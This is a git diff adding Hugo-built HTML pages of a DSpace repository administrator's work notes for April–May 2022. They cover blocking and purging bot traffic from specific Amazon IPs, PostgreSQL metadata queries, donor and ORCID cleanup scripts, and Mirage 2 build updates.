+<li>But there appear to be some IPs making many requests:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>    345 207.46.13.53
+</span></span><span style="display:flex;"><span>    646 66.249.66.222
+</span></span><span style="display:flex;"><span>    678 54.90.79.112
+</span></span><span style="display:flex;"><span>   1529 136.243.148.249
+</span></span><span style="display:flex;"><span>   1797 54.175.8.110
+</span></span><span style="display:flex;"><span>   2304 174.129.118.171
+</span></span><span style="display:flex;"><span>   2523 66.249.66.221
+</span></span><span style="display:flex;"><span>   2632 52.73.204.196
+</span></span><span style="display:flex;"><span>   2667 54.174.240.122
+</span></span><span style="display:flex;"><span>   5206 35.172.193.232
+</span></span><span style="display:flex;"><span>   5646 35.153.131.101
+</span></span><span style="display:flex;"><span>   6373 3.85.92.145
+</span></span><span style="display:flex;"><span>   7383 34.227.10.4
+</span></span><span style="display:flex;"><span>   8330 100.24.63.172
+</span></span><span style="display:flex;"><span>   8342 34.236.36.176
+</span></span><span style="display:flex;"><span>   8369 44.200.190.111
+</span></span><span style="display:flex;"><span>   8371 3.238.116.153
+</span></span><span style="display:flex;"><span>   8391 18.232.101.158
+</span></span><span style="display:flex;"><span>   8631 3.239.81.247
+</span></span><span style="display:flex;"><span>   8634 54.82.125.225
+</span></span></code></pre></div><ul>
+<li>54.82.125.225, 3.239.81.247, 18.232.101.158, 3.238.116.153, 44.200.190.111, 34.236.36.176, 100.24.63.172, 3.85.92.145, 35.153.131.101, 35.172.193.232, 54.174.240.122, 52.73.204.196, 174.129.118.171, 54.175.8.110, and 54.90.79.112 are all on Amazon and using this normal-looking user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.3
+</code></pre><ul>
+<li>None of these hosts are re-using their DSpace session ID so they are definitely not normal browsers as they are claiming:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep 54.82.125.225 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>5760
+</span></span><span style="display:flex;"><span>$ grep 3.239.81.247 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>6053
+</span></span><span style="display:flex;"><span>$ grep 18.232.101.158 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>5841
+</span></span><span style="display:flex;"><span>$ grep 3.238.116.153 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>5887
+</span></span><span style="display:flex;"><span>$ grep 44.200.190.111 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>5899
+</span></span><span style="display:flex;"><span>...
+</span></span></code></pre></div><ul>
+<li>And we can see a massive spike in sessions in Munin:</li>
+</ul>
+<p><img src="/cgspace-notes/2022/04/jmx_dspace_sessions-day2.png" alt="Grafana load"></p>
+<ul>
+<li>I see the following IPs using that user agent today:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep <span style="color:#e6db74">&#39;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36&#39;</span> /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h
+</span></span><span style="display:flex;"><span>    678 54.90.79.112
+</span></span><span style="display:flex;"><span>   1797 54.175.8.110
+</span></span><span style="display:flex;"><span>   2697 174.129.118.171
+</span></span><span style="display:flex;"><span>   2765 52.73.204.196
+</span></span><span style="display:flex;"><span>   3072 54.174.240.122
+</span></span><span style="display:flex;"><span>   5206 35.172.193.232
+</span></span><span style="display:flex;"><span>   5646 35.153.131.101
+</span></span><span style="display:flex;"><span>   6783 3.85.92.145
+</span></span><span style="display:flex;"><span>   7763 34.227.10.4
+</span></span><span style="display:flex;"><span>   8738 100.24.63.172
+</span></span><span style="display:flex;"><span>   8748 34.236.36.176
+</span></span><span style="display:flex;"><span>   8787 3.238.116.153
+</span></span><span style="display:flex;"><span>   8794 18.232.101.158
+</span></span><span style="display:flex;"><span>   8806 44.200.190.111
+</span></span><span style="display:flex;"><span>   9021 54.82.125.225
+</span></span><span style="display:flex;"><span>   9027 3.239.81.247
+</span></span></code></pre></div><ul>
+<li>I added those IPs to the firewall and then purged their hits from Solr:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+</span></span><span style="display:flex;"><span>Purging 6024 hits from 100.24.63.172 in statistics
+</span></span><span style="display:flex;"><span>Purging 1719 hits from 174.129.118.171 in statistics
+</span></span><span style="display:flex;"><span>Purging 5972 hits from 18.232.101.158 in statistics
+</span></span><span style="display:flex;"><span>Purging 6053 hits from 3.238.116.153 in statistics
+</span></span><span style="display:flex;"><span>Purging 6228 hits from 3.239.81.247 in statistics
+</span></span><span style="display:flex;"><span>Purging 5305 hits from 34.227.10.4 in statistics
+</span></span><span style="display:flex;"><span>Purging 6002 hits from 34.236.36.176 in statistics
+</span></span><span style="display:flex;"><span>Purging 3908 hits from 35.153.131.101 in statistics
+</span></span><span style="display:flex;"><span>Purging 3692 hits from 35.172.193.232 in statistics
+</span></span><span style="display:flex;"><span>Purging 4525 hits from 3.85.92.145 in statistics
+</span></span><span style="display:flex;"><span>Purging 6048 hits from 44.200.190.111 in statistics
+</span></span><span style="display:flex;"><span>Purging 1942 hits from 52.73.204.196 in statistics
+</span></span><span style="display:flex;"><span>Purging 1944 hits from 54.174.240.122 in statistics
+</span></span><span style="display:flex;"><span>Purging 1264 hits from 54.175.8.110 in statistics
+</span></span><span style="display:flex;"><span>Purging 6117 hits from 54.82.125.225 in statistics
+</span></span><span style="display:flex;"><span>Purging 486 hits from 54.90.79.112 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 67229
+</span></span></code></pre></div><ul>
+<li>Then I created a CSV with these IPs and reported them to AbuseIPDB.com:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/ips.csv
+</span></span><span style="display:flex;"><span>IP,Categories,ReportDate,Comment
+</span></span><span style="display:flex;"><span>100.24.63.172,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>174.129.118.171,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>18.232.101.158,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>3.238.116.153,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>3.239.81.247,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>34.227.10.4,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>34.236.36.176,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>35.153.131.101,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>35.172.193.232,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>3.85.92.145,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>44.200.190.111,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>52.73.204.196,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>54.174.240.122,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>54.175.8.110,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>54.82.125.225,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span><span style="display:flex;"><span>54.90.79.112,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
+</span></span></code></pre></div><ul>
+<li>An hour or so later two more IPs on Amazon started making requests with that user agent too:
+<ul>
+<li>3.82.22.114</li>
+<li>18.234.122.84</li>
+</ul>
+</li>
+<li>Load on the server went back up, sigh</li>
+<li>I added those IPs to the firewall drop list and purged their hits from Solr as well:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+</span></span><span style="display:flex;"><span>Purging 2839 hits from 3.82.22.114 in statistics
+</span></span><span style="display:flex;"><span>Purging 592 hits from 18.234.122.84 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 343
+</span></span></code></pre></div><ul>
+<li>Oh god, there are more coming
+<ul>
+<li>3.81.21.251</li>
+<li>54.162.92.93</li>
+<li>54.226.171.89</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-04-28">2022-04-28</h2>
+<ul>
+<li>Had a meeting with FAO and the team from SEAFDAC, who run many repositories that are integrated with AGROVOC
+<ul>
+<li>Elvi from SEAFDAC has modified the <a href="https://github.com/eulereadgbe/DSpace/blob/sair-6.3/dspace-api/src/main/java/org/dspace/content/authority/AgrovocAuthority.java">DSpace-CRIS 6.x VIAF lookup plugin to query AGROVOC</a></li>
+<li>Also, they are doing a nice integration similar to the WorldFish / MELSpace repositories where they store the AGROVOC URIs in DSpace and show the terms with an icon in the UI</li>
+<li>See: <a href="https://repository.seafdec.org.ph/handle/10862/6320">https://repository.seafdec.org.ph/handle/10862/6320</a></li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2022-05/index.html b/docs/2022-05/index.html
new file mode 100644
index 000000000..dd86a319c
--- /dev/null
+++ b/docs/2022-05/index.html
@@ -0,0 +1,499 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="May, 2022" />
+<meta property="og:description" content="2022-05-04
+
+I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too:
+
+18.207.136.176
+185.189.36.248
+50.118.223.78
+52.70.76.123
+3.236.10.11
+
+
+Looking at the Solr statistics for 2022-04
+
+52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests
+64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc
+185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt
+157.55.39.159 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr
+52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
+157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
+207.46.13.177 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr
+If I query Solr for time:2022-04* AND dns:*msnbot* AND dns:*.msn.com. I see a handful of IPs that made 41,000 requests
+
+
+I purged 93,974 hits from these IPs using my check-spider-ip-hits.sh script
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-05/" />
+<meta property="article:published_time" content="2022-05-04T09:13:39+03:00" />
+<meta property="article:modified_time" content="2022-05-30T16:00:02+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="May, 2022"/>
+<meta name="twitter:description" content="2022-05-04
+
+I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too:
+
+18.207.136.176
+185.189.36.248
+50.118.223.78
+52.70.76.123
+3.236.10.11
+
+
+Looking at the Solr statistics for 2022-04
+
+52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests
+64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc
+185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt
+157.55.39.159 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr
+52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
+157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
+207.46.13.177 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr
+If I query Solr for time:2022-04* AND dns:*msnbot* AND dns:*.msn.com. I see a handful of IPs that made 41,000 requests
+
+
+I purged 93,974 hits from these IPs using my check-spider-ip-hits.sh script
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "May, 2022",
+  "url": "https://alanorth.github.io/cgspace-notes/2022-05/",
+  "wordCount": "1673",
+  "datePublished": "2022-05-04T09:13:39+03:00",
+  "dateModified": "2022-05-30T16:00:02+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-05/">
+
+    <title>May, 2022 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-05/">May, 2022</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2022-05-04T09:13:39+03:00">Wed May 04, 2022</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-05-04">2022-05-04</h2>
+<ul>
+<li>I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too:
+<ul>
+<li>18.207.136.176</li>
+<li>185.189.36.248</li>
+<li>50.118.223.78</li>
+<li>52.70.76.123</li>
+<li>3.236.10.11</li>
+</ul>
+</li>
+<li>Looking at the Solr statistics for 2022-04
+<ul>
+<li>52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests</li>
+<li>64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc</li>
+<li>185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt</li>
+<li>157.55.39.159 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li>
+<li>52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li>
+<li>157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li>
+<li>207.46.13.177 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li>
+<li>If I query Solr for <code>time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.</code> I see a handful of IPs that made 41,000 requests</li>
+</ul>
+</li>
+<li>I purged 93,974 hits from these IPs using my <code>check-spider-ip-hits.sh</code> script</li>
+</ul>
+<ul>
+<li>Now looking at the Solr statistics by user agent I see:
+<ul>
+<li><code>SomeRandomText</code></li>
+<li><code>RestSharp/106.11.7.0</code></li>
+<li><code>MetaInspector/5.7.0 (+https://github.com/jaimeiniesta/metainspector)</code></li>
+<li><code>wp_is_mobile</code></li>
+<li><code>Mozilla/5.0 (compatible; um-LN/1.0; mailto: techinfo@ubermetrics-technologies.com; Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1&quot;</code></li>
+<li><code>insomnia/2022.2.1</code></li>
+<li><code>ZoteroTranslationServer</code></li>
+<li><code>omgili/0.5 +http://omgili.com</code></li>
+<li><code>curb</code></li>
+<li><code>Sprout Social (Link Attachment)</code></li>
+</ul>
+</li>
+<li>I purged 2,900 hits from these user agents from Solr using my <code>check-spider-hits.sh</code> script</li>
+<li>I made a <a href="https://github.com/atmire/COUNTER-Robots/pull/54">pull request to COUNTER-Robots</a> for some of these agents
+<ul>
+<li>In the mean time I will add them to our local overrides in DSpace</li>
+</ul>
+</li>
+<li>Run all system updates on AReS server, update all Docker containers, and restart the server
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-05-05">2022-05-05</h2>
+<ul>
+<li>Update PostgreSQL JDBC driver to 42.3.5 in the Ansible infrastructure playbooks and deploy on DSpace Test</li>
+<li>Peter asked me how many items we add to CGSpace every year
+<ul>
+<li>I wrote a SQL query to check the number of items grouped by their accession dates since 2009:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ SELECT EXTRACT(year from text_value::date) AS YYYY, COUNT(*) FROM metadatavalue WHERE metadata_field_id=11 GROUP BY YYYY ORDER BY YYYY DESC LIMIT 14;
+</span></span><span style="display:flex;"><span> yyyy │ count 
+</span></span><span style="display:flex;"><span>──────┼───────
+</span></span><span style="display:flex;"><span> 2022 │  2073
+</span></span><span style="display:flex;"><span> 2021 │  6471
+</span></span><span style="display:flex;"><span> 2020 │  4074
+</span></span><span style="display:flex;"><span> 2019 │  7330
+</span></span><span style="display:flex;"><span> 2018 │  8899
+</span></span><span style="display:flex;"><span> 2017 │  6860
+</span></span><span style="display:flex;"><span> 2016 │  8451
+</span></span><span style="display:flex;"><span> 2015 │ 15692
+</span></span><span style="display:flex;"><span> 2014 │ 16479
+</span></span><span style="display:flex;"><span> 2013 │  4388
+</span></span><span style="display:flex;"><span> 2012 │  6472
+</span></span><span style="display:flex;"><span> 2011 │  2694
+</span></span><span style="display:flex;"><span> 2010 │  2457
+</span></span><span style="display:flex;"><span> 2009 │   293
+</span></span></code></pre></div><ul>
+<li>Note that I had an issue with casting <code>text_value</code> to date because one item had an accession date of <code>2016</code> instead of <code>2016-09-29T20:14:47Z</code>
+<ul>
+<li>Once I fixed that PostgreSQL was able to <a href="https://www.postgresql.org/docs/12/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT">extract() the year</a></li>
+<li>There were some other methods I tried that worked also, for example <code>TO_DATE()</code>:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ SELECT EXTRACT(year from TO_DATE(text_value, &#39;YYYY-MM-DD&#34;T&#34;HH24:MI:SS&#34;Z&#34;&#39;)) AS YYYY, COUNT(*) FROM metadatavalue WHERE metadata_field_id=11 GROUP BY YYYY ORDER BY YYYY DESC LIMIT 14;
+</span></span></code></pre></div><ul>
+<li>But it seems PostgreSQL is smart enough to recognize date formatting in strings automatically when we cast so we don&rsquo;t need to convert to date first</li>
+<li>Another thing I noticed is that a few hundred items have accession dates from decades ago, perhaps this is due to importing items from the CGIAR Library?</li>
+<li>I spent some time merging a few pull requests for DSpace 6.4 and porting one to <code>main</code> for DSpace 7.x</li>
+<li>I also submitted a <a href="https://github.com/DSpace/DSpace/pull/8288">pull request to migrate Mirage 2&rsquo;s build from bower and compass to yarn and node-sass</a></li>
+</ul>
+<h2 id="2022-05-07">2022-05-07</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-05-09">2022-05-09</h2>
+<ul>
+<li>Submit an issue to Atmire&rsquo;s bug tracker inquiring about DSpace 6.4 support</li>
+</ul>
+<h2 id="2022-05-10">2022-05-10</h2>
+<ul>
+<li>Submit an updated <a href="https://github.com/DSpace/DSpace/pull/8292">pull request to migrate Mirage 2&rsquo;s build from bower and compass to npm and node-sass</a>
+<ul>
+<li>This one is better than the previous one because it uses npm directly, which comes with the Node.js distribution, rather than requiring the user to install yarn</li>
+<li>I also updated a bunch of grunt build deps</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-05-12">2022-05-12</h2>
+<ul>
+<li>CGSpace meeting with Abenet and Peter
+<ul>
+<li>We discussed the future of CGSpace and DSpace in general in the new One CGIAR</li>
+<li>We discussed how to prepare for bringing in content from the Initiatives, whether we need new metadata fields to support people from IFPRI etc</li>
+<li>We discussed the need for good quality Drupal and WordPress modules so sites can harvest content from the repository</li>
+<li>Peter asked me to send him a list of investors/funders/donors so he can clean it up, but also to try to align it with ROR and evntually do something like we do with country codes, adding the ROR IDs and potentially showing the badge on item views</li>
+<li>We also discussed removing some Mirage 2 themes for old programs and CRPs that don&rsquo;t have custom branding, ie only Google Analytics</li>
+</ul>
+</li>
+<li>Export a list of donors for Peter to clean up:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.donor&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-05-12-donors.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 1184
+</span></span></code></pre></div><ul>
+<li>Then I created a CSV from our <code>cg-creator-identifier.xml</code> controlled vocabulary and ran it against our database with <code>add-orcid-identifiers-csv.py</code> to see if any author names by chance matched that are missing ORCIDs in CGSpace</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-05-12-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> | tee /tmp/orcid.log
+</span></span><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#34;Adding ORCID&#34;</span> /tmp/add-orcids.log
+</span></span><span style="display:flex;"><span>85
+</span></span></code></pre></div><ul>
+<li>So it&rsquo;s only eighty-five, but better than nothing&hellip;</li>
+<li>I removed the custom Mirage 2 themes for some old projects:
+<ul>
+<li>AgriFood</li>
+<li>AVCD</li>
+<li>LIVES</li>
+<li>FeedTheFuture</li>
+<li>DrylandSystems</li>
+<li>TechnicalConsortium</li>
+<li>EADD</li>
+</ul>
+</li>
+<li>That should knock off a few minutes of the maven build time!</li>
+<li>I generated a report from the AReS nginx logs on linode18:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log.* | grep <span style="color:#e6db74">&#39;GET /explorer&#39;</span> | goaccess --log-format<span style="color:#f92672">=</span>COMBINED - -o /tmp/ares_report.html
+</span></span></code></pre></div><h2 id="2022-05-13">2022-05-13</h2>
+<ul>
+<li>Peter finalized the corrections on donors from yesterday so I extracted them into fix/delete CSVs and ran them on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i 2022-05-13-fix-CGSpace-Donors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.donor -m <span style="color:#ae81ff">248</span> -t correct -d
+</span></span><span style="display:flex;"><span>$ ./ilri/delete-metadata-values.py -i 2022-05-13-delete-CGSpace-Donors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.donor -m <span style="color:#ae81ff">248</span> -d
+</span></span></code></pre></div><ul>
+<li>I cleaned up a few records manually (like some that had \r\n) then re-exported the donors and checked against the latest ROR dump:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2022-05-13-donors.csv -r v1.0-2022-03-17-ror-data.json -o /tmp/2022-05-13-ror.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2022-05-13-ror.csv | wc -l
+</span></span><span style="display:flex;"><span>230
+</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m false /tmp/2022-05-13-ror.csv | csvcut -c organization &gt; /tmp/2022-05-13-ror-unmatched.csv
+</span></span></code></pre></div><ul>
+<li>Then I sent Peter a list so he can try to update some from ROR</li>
+<li>I did some work to upgrade the Mirage 2 build dependencies in our <code>6_x-prod</code> branch
+<ul>
+<li>I switched to Node.js 14 also</li>
+</ul>
+</li>
